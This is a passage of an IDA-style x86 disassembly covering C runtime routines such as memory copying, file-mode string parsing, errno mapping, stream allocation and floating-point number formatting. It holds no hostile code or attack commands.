; ---------------------------------------------------------------------------
loc_417804: ; CODE XREF: sub_4177B0+46�j
jmp dword ptr ds:loc_41790C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41780C: ; CODE XREF: sub_4177B0+31�j
; sub_4177B0+8E�j ...
jmp ds:off_417890[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417820
dd offset loc_41784C
dd offset loc_417870
; ---------------------------------------------------------------------------
loc_417820: ; DATA XREF: sub_4177B0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41784C: ; DATA XREF: sub_4177B0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417870: ; DATA XREF: sub_4177B0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417890 dd offset loc_4178F3 ; DATA XREF: sub_4177B0:loc_41780C�r
dd offset loc_4178E0
dd offset loc_4178D8
dd offset loc_4178D0
dd offset loc_4178C8
dd offset loc_4178C0
dd offset loc_4178B8
dd offset loc_4178B0
; ---------------------------------------------------------------------------
loc_4178B0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4178B8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4178C0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4178C8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4178D0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4178D8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4178E0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4178F3: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0:off_417890�o
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4178FC dd offset loc_41790C ; DATA XREF: sub_4177B0+35�r
; sub_4177B0+92�r ...
dd offset loc_417914
dd offset loc_417920
dd offset loc_417934
; ---------------------------------------------------------------------------
loc_41790C: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417914: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417920: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417934: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41794C: ; CODE XREF: sub_4177B0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_417980
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_417974: ; CODE XREF: sub_4177B0+1B5�j
; sub_4177B0+210�j ...
neg ecx
jmp ds:off_417A48[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417980: ; CODE XREF: sub_4177B0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417998
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_417998+4[eax*4]
; ---------------------------------------------------------------------------
loc_417998: ; CODE XREF: sub_4177B0+1DA�j
; DATA XREF: sub_4177B0+1E1�r
jmp ds:off_417A98[ecx*4]
; ---------------------------------------------------------------------------
align 10h
lodsb
jns short loc_4179E4
add al, dl
jns short near ptr loc_4179E7+1
add al, bh
jns short loc_4179EC
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
loc_4179E4: ; CODE XREF: sub_4177B0+1F1�j
sub edi, 2
loc_4179E7: ; CODE XREF: sub_4177B0+1F5�j
cmp ecx, 8
jb short loc_417974
loc_4179EC: ; CODE XREF: sub_4177B0+1F9�j
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417A4C
dd offset loc_417A54
dd offset loc_417A5C
dd offset loc_417A64
dd offset loc_417A6C
dd offset loc_417A74
dd offset loc_417A7C
off_417A48 dd offset loc_417A8F ; DATA XREF: sub_4177B0+1C6�r
; ---------------------------------------------------------------------------
loc_417A4C: ; DATA XREF: sub_4177B0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_417A54: ; DATA XREF: sub_4177B0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417A5C: ; DATA XREF: sub_4177B0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_417A64: ; DATA XREF: sub_4177B0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417A6C: ; DATA XREF: sub_4177B0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_417A74: ; DATA XREF: sub_4177B0+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417A7C: ; DATA XREF: sub_4177B0+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417A8F: ; CODE XREF: sub_4177B0+1C6�j
; DATA XREF: sub_4177B0:off_417A48�o
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
off_417A98 dd offset loc_417AA8 ; DATA XREF: sub_4177B0+1BB�r
; sub_4177B0:loc_417998�r ...
dd offset loc_417AB0
dd offset loc_417AC0
dd offset loc_417AD4
; ---------------------------------------------------------------------------
loc_417AA8: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417AB0: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417AC0: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417AD4: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4177B0 endp
; =============== S U B R O U T I N E =======================================
sub_417AED proc near ; CODE XREF: sub_41318A+150�p
; sub_41318A+19B�p ...
arg_0 = dword ptr 4
mov eax, dword_47A010
test eax, eax
jz short loc_417B05
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_417B05
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417B05: ; CODE XREF: sub_417AED+7�j
; sub_417AED+12�j
xor eax, eax
retn
sub_417AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B08 proc near ; CODE XREF: sub_413337+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_47A1B8
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_417B41
cmp al, 72h
jz short loc_417B3A
cmp al, 77h
jnz loc_417C4D
mov ecx, 301h
jmp short loc_417B46
; ---------------------------------------------------------------------------
loc_417B3A: ; CODE XREF: sub_417B08+21�j
xor ecx, ecx
or esi, 1
jmp short loc_417B49
; ---------------------------------------------------------------------------
loc_417B41: ; CODE XREF: sub_417B08+1D�j
mov ecx, 109h
loc_417B46: ; CODE XREF: sub_417B08+30�j
or esi, 2
loc_417B49: ; CODE XREF: sub_417B08+37�j
xor edx, edx
inc edx
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417B51: ; CODE XREF: sub_417B08+125�j
cmp edx, ebx
jz loc_417C33
movsx eax, al
cmp eax, 54h
jg short loc_417BD2
jz short loc_417BC5
sub eax, 2Bh
jz short loc_417BAF
sub eax, 19h
jz short loc_417BA5
sub eax, 0Eh
jz short loc_417B91
dec eax
jnz loc_417C0A
cmp [ebp+var_4], ebx
jnz loc_417C0A
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417B91: ; CODE XREF: sub_417B08+68�j
cmp [ebp+var_4], ebx
jnz short loc_417C0A
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417BA5: ; CODE XREF: sub_417B08+63�j
test cl, 40h
jnz short loc_417C0A
or ecx, 40h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BAF: ; CODE XREF: sub_417B08+5E�j
test cl, 2
jnz short loc_417C0A
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BC5: ; CODE XREF: sub_417B08+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_417C0A
or ecx, eax
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BD2: ; CODE XREF: sub_417B08+57�j
sub eax, 62h
jz short loc_417C1D
dec eax
jz short loc_417C05
sub eax, 0Bh
jz short loc_417BF1
sub eax, 6
jnz short loc_417C0A
test ch, 0C0h
jnz short loc_417C0A
or ecx, 4000h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BF1: ; CODE XREF: sub_417B08+D5�j
cmp [ebp+var_8], ebx
jnz short loc_417C0A
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C05: ; CODE XREF: sub_417B08+D0�j
cmp [ebp+var_8], ebx
jz short loc_417C0E
loc_417C0A: ; CODE XREF: sub_417B08+6B�j
; sub_417B08+74�j ...
xor edx, edx
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C0E: ; CODE XREF: sub_417B08+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C1D: ; CODE XREF: sub_417B08+CD�j
test ch, 0C0h
jnz short loc_417C0A
or ecx, 8000h
loc_417C28: ; CODE XREF: sub_417B08+44�j
; sub_417B08+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_417B51
loc_417C33: ; CODE XREF: sub_417B08+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41C294
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_417C51
loc_417C4D: ; CODE XREF: sub_417B08+25�j
xor eax, eax
jmp short loc_417C6B
; ---------------------------------------------------------------------------
loc_417C51: ; CODE XREF: sub_417B08+143�j
mov eax, [ebp+arg_C]
inc dword_479EB8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_417C6B: ; CODE XREF: sub_417B08+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_417B08 endp
; =============== S U B R O U T I N E =======================================
sub_417C70 proc near ; CODE XREF: sub_413337+18�p
; sub_4134AF+2B�p ...
call sub_415456
add eax, 8
retn
sub_417C70 endp
; =============== S U B R O U T I N E =======================================
sub_417C79 proc near ; CODE XREF: sub_4134AF+36�p
; sub_416387+8A�p ...
call sub_415456
add eax, 0Ch
retn
sub_417C79 endp
; =============== S U B R O U T I N E =======================================
sub_417C82 proc near ; CODE XREF: sub_4134AF+16�p
; sub_414125+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_415456
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_417C91: ; CODE XREF: sub_417C82+1C�j
cmp ecx, dword_42CCB0[esi*8]
jz short loc_417CB8
inc esi
cmp esi, 2Dh
jb short loc_417C91
cmp ecx, 13h
jb short loc_417CC9
cmp ecx, 24h
ja short loc_417CC9
call sub_415456
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CB8: ; CODE XREF: sub_417C82+16�j
call sub_415456
mov ecx, dword_42CCB4[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CC9: ; CODE XREF: sub_417C82+21�j
; sub_417C82+26�j
cmp ecx, 0BCh
jb short loc_417CE7
cmp ecx, 0CAh
ja short loc_417CE7
call sub_415456
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CE7: ; CODE XREF: sub_417C82+4D�j
; sub_417C82+55�j
call sub_415456
mov dword ptr [eax+8], 16h
pop esi
retn
sub_417C82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CF5 proc near ; CODE XREF: sub_413337+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_427A50
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_417D15: ; CODE XREF: sub_417CF5+85�j
mov [ebp+var_20], esi
cmp esi, dword_47B660
jge loc_417DE4
mov eax, dword_47A644
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_417D80
test byte ptr [eax+0Ch], 83h
jnz short loc_417D79
cmp esi, 2
jle short loc_417D52
cmp esi, 14h
jge short loc_417D52
lea eax, [esi+10h]
push eax
call sub_416882
pop ecx
test eax, eax
jz loc_417DE4
loc_417D52: ; CODE XREF: sub_417CF5+44�j
; sub_417CF5+49�j
mov eax, dword_47A644
push dword ptr [eax+esi*4]
push esi
call sub_4166A2
pop ecx
pop ecx
mov eax, dword_47A644
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_417D7C
push eax
push esi
call sub_4166F4
pop ecx
pop ecx
loc_417D79: ; CODE XREF: sub_417CF5+3F�j
inc esi
jmp short loc_417D15
; ---------------------------------------------------------------------------
loc_417D7C: ; CODE XREF: sub_417CF5+79�j
mov edi, eax
jmp short loc_417DE1
; ---------------------------------------------------------------------------
loc_417D80: ; CODE XREF: sub_417CF5+39�j
shl esi, 2
push 38h
call sub_41344D
pop ecx
mov ecx, dword_47A644
mov [esi+ecx], eax
mov eax, dword_47A644
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_417DE4
push 0FA0h
add eax, 20h
push eax
call sub_41BBD8
pop ecx
pop ecx
test eax, eax
mov eax, dword_47A644
jnz short loc_417DCC
push dword ptr [esi+eax]
call sub_412FE4
pop ecx
mov eax, dword_47A644
mov [esi+eax], ebx
jmp short loc_417DE4
; ---------------------------------------------------------------------------
loc_417DCC: ; CODE XREF: sub_417CF5+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41F01C ; RtlEnterCriticalSection
mov eax, dword_47A644
mov edi, [esi+eax]
loc_417DE1: ; CODE XREF: sub_417CF5+89�j
mov [ebp+var_1C], edi
loc_417DE4: ; CODE XREF: sub_417CF5+29�j
; sub_417CF5+57�j ...
cmp edi, ebx
jz short loc_417DFA
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_417DFA: ; CODE XREF: sub_417CF5+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417E0E
mov eax, edi
call __SEH_epilog
retn
sub_417CF5 endp
; =============== S U B R O U T I N E =======================================
sub_417E0B proc near ; DATA XREF: .rdata:stru_427A50�o
mov edi, [ebp-1Ch]
sub_417E0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417E0E proc near ; CODE XREF: sub_417CF5+109�p
push 1
call sub_41686D
pop ecx
retn
sub_417E0E endp
; =============== S U B R O U T I N E =======================================
sub_417E17 proc near ; DATA XREF: sub_413460+1E�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_413A6E
cmp eax, 65h
jmp short loc_417E36
; ---------------------------------------------------------------------------
loc_417E2A: ; CODE XREF: sub_417E17+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41ABBC
test eax, eax
loc_417E36: ; CODE XREF: sub_417E17+11�j
pop ecx
jnz short loc_417E2A
mov al, [esi]
mov cl, byte_42D090
mov [esi], cl
inc esi
loc_417E44: ; CODE XREF: sub_417E17+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_417E44
pop esi
retn
sub_417E17 endp
; =============== S U B R O U T I N E =======================================
sub_417E53 proc near ; DATA XREF: sub_413460+A�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_42D090
jmp short loc_417E65
; ---------------------------------------------------------------------------
loc_417E60: ; CODE XREF: sub_417E53+16�j
cmp cl, bl
jz short loc_417E6B
inc eax
loc_417E65: ; CODE XREF: sub_417E53+B�j
mov cl, [eax]
test cl, cl
jnz short loc_417E60
loc_417E6B: ; CODE XREF: sub_417E53+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_417E9C
jmp short loc_417E7F
; ---------------------------------------------------------------------------
loc_417E74: ; CODE XREF: sub_417E53+30�j
cmp cl, 65h
jz short loc_417E85
cmp cl, 45h
jz short loc_417E85
inc eax
loc_417E7F: ; CODE XREF: sub_417E53+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_417E74
loc_417E85: ; CODE XREF: sub_417E53+24�j
; sub_417E53+29�j
mov edx, eax
loc_417E87: ; CODE XREF: sub_417E53+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_417E87
cmp [eax], bl
jnz short loc_417E92
dec eax
loc_417E92: ; CODE XREF: sub_417E53+3C�j
; sub_417E53+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_417E92
loc_417E9C: ; CODE XREF: sub_417E53+1D�j
pop ebx
retn
sub_417E53 endp
; =============== S U B R O U T I N E =======================================
sub_417E9E proc near ; DATA XREF: sub_413460+28�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 1
jnz short loc_417EB5
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417EB5: ; CODE XREF: sub_417E9E+11�j
xor eax, eax
retn
sub_417E9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EB8 proc near ; DATA XREF: sub_413460+14�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_417EE1
lea eax, [ebp+var_8]
push eax
call sub_41C60D
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_417EE1: ; CODE XREF: sub_417EB8+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41C650
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_417EB8 endp
; =============== S U B R O U T I N E =======================================
sub_417EF6 proc near ; CODE XREF: sub_417F13+23�p
; sub_418035+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_417F11
push esi
call sub_416000
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41BC70
add esp, 10h
loc_417F11: ; CODE XREF: sub_417EF6+5�j
pop esi
retn
sub_417EF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F13 proc near ; CODE XREF: sub_417FC1+5B�p
; sub_418139+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_417F3C
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_417EF6
pop edi
loc_417F3C: ; CODE XREF: sub_417F13+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_417F49
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_417F49: ; CODE XREF: sub_417F13+2E�j
cmp [ebp+arg_0], 0
jle short loc_417F60
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_42D090
mov [eax], cl
loc_417F60: ; CODE XREF: sub_417F13+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_427A68
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_41B390
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_417F85
mov byte ptr [ecx], 45h
loc_417F85: ; CODE XREF: sub_417F13+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_417FBC
mov eax, [esi+4]
dec eax
jns short loc_417F99
neg eax
mov byte ptr [ecx], 2Dh
loc_417F99: ; CODE XREF: sub_417F13+7F�j
inc ecx
cmp eax, 64h
jl short loc_417FA9
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_417FA9: ; CODE XREF: sub_417F13+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_417FB9
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_417FB9: ; CODE XREF: sub_417F13+9A�j
add [ecx+1], al
loc_417FBC: ; CODE XREF: sub_417F13+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_417F13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FC1 proc near ; CODE XREF: sub_4181D9+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41C693
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_417F13
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_4182D6
leave
retn
sub_417FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418035 proc near ; CODE XREF: sub_4180D1+4F�p
; sub_418139+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_418062
cmp eax, [ebp+arg_4]
jnz short loc_418062
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_418062: ; CODE XREF: sub_418035+10�j
; sub_418035+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_41806E
mov byte ptr [ebx], 2Dh
inc ebx
loc_41806E: ; CODE XREF: sub_418035+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_418085
mov eax, ebx
call sub_417EF6
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_418087
; ---------------------------------------------------------------------------
loc_418085: ; CODE XREF: sub_418035+41�j
add ebx, eax
loc_418087: ; CODE XREF: sub_418035+4E�j
cmp [ebp+arg_4], 0
jle short loc_4180C9
mov eax, ebx
call sub_417EF6
mov al, byte_42D090
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_4180C9
neg esi
cmp [ebp+arg_8], 0
jnz short loc_4180B0
cmp [ebp+arg_4], esi
jl short loc_4180B3
loc_4180B0: ; CODE XREF: sub_418035+74�j
mov [ebp+arg_4], esi
loc_4180B3: ; CODE XREF: sub_418035+79�j
mov edi, [ebp+arg_4]
mov eax, ebx
call sub_417EF6
push edi
push 30h
push ebx
call sub_41ADD0
add esp, 0Ch
loc_4180C9: ; CODE XREF: sub_418035+56�j
; sub_418035+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_418035 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180D1 proc near ; CODE XREF: sub_4181D9+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41C693
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_418035
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_4182D6
leave
retn
sub_4180D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418139 proc near ; CODE XREF: sub_4181D9+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
